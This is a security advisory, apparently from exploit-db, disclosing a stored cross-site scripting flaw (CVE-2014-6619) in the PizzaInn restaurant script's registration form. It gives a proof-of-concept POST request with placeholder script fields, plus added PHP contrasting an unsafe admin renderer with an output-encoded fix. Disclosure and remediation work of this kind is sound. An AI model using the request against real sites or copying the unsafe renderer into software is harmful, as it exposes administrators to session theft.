Restaurant Script (PizzaInn Project) – Persistent Cross-Site Scripting

  • Author: Kenneth F. Belva
    Date: 2014-09-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/34760/
  • Title: Pizza Inn Registration Stored XSS
    Severity: High
    CVE-ID: CVE-2014-6619
    Release Date: 20 September 2014
    Author: Kenneth F. Belva
    Websites: http://silverbackventuresllc.com
    http://xssWarrior.com
    http://securitymaverick.com
    Twitter: @infosecmaverick
    Contact: Please use website contact form.
    Mail: 
    URL: http://sourceforge.net/projects/restaurantmis/
    Vendor: 
    Remote Exploit: Yes
    
    Discovered with: xssWarrior - http://xssWarrior.com
    
    
    Description:
    ============
    
    XSS code submitted in the registration fields is stored in the database. It executes when the administrator views the new sign-ups.
    
    
    Proof of Concept:
    ==================
    
    http://[domain]/PizzaInn/register-exec.php
    fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register
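
The store-then-render flow from the Description, with the output-encoding fix beside it. This is an added example, not code from the advisory or from the PizzaInn project: the `members` table, the `e()` helper and both render functions are hypothetical, only the field names `fname`, `lname` and `login` come from the proof of concept, and the sample sign-up is constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical schema for illustration; only the column names are taken
// from the advisory's request parameters.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (fname TEXT, lname TEXT, login TEXT)');

// Constructed sample sign-up: harmless marker markup stands in for [code].
// A prepared statement stores the value faithfully; it does nothing about XSS.
$marker = '<script>alert(1)</script>';
$stmt = $db->prepare('INSERT INTO members (fname, lname, login) VALUES (?, ?, ?)');
$stmt->execute([$marker, 'Doe', 'jdoe']);

// Encode a stored value for an HTML text or attribute context at output time.
function e(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": stored values are echoed verbatim, so stored markup becomes
// live markup in the administrator's browser.
function renderRowUnsafe(array $row): string
{
    return "<tr><td>{$row['fname']}</td><td>{$row['lname']}</td><td>{$row['login']}</td></tr>";
}

// "After": every stored field is encoded before it reaches the page.
function renderRowSafe(array $row): string
{
    return '<tr><td>' . e($row['fname']) . '</td><td>' . e($row['lname'])
         . '</td><td>' . e($row['login']) . '</td></tr>';
}

$rows = $db->query('SELECT fname, lname, login FROM members')->fetchAll(PDO::FETCH_ASSOC);
foreach ($rows as $row) {
    $unsafe = renderRowUnsafe($row);
    $safe   = renderRowSafe($row);
    // Check a reviewer or regression test can apply to the rendered admin page.
    printf("unsafe row contains raw <script: %s\n", stripos($unsafe, '<script') !== false ? 'yes' : 'no');
    printf("safe row contains raw <script: %s\n", stripos($safe, '<script') !== false ? 'yes' : 'no');
    echo $safe, "\n";
}
```

Encoding belongs at the point of output because values already stored in the database before the fix stay as they are and are only neutralized when rendered.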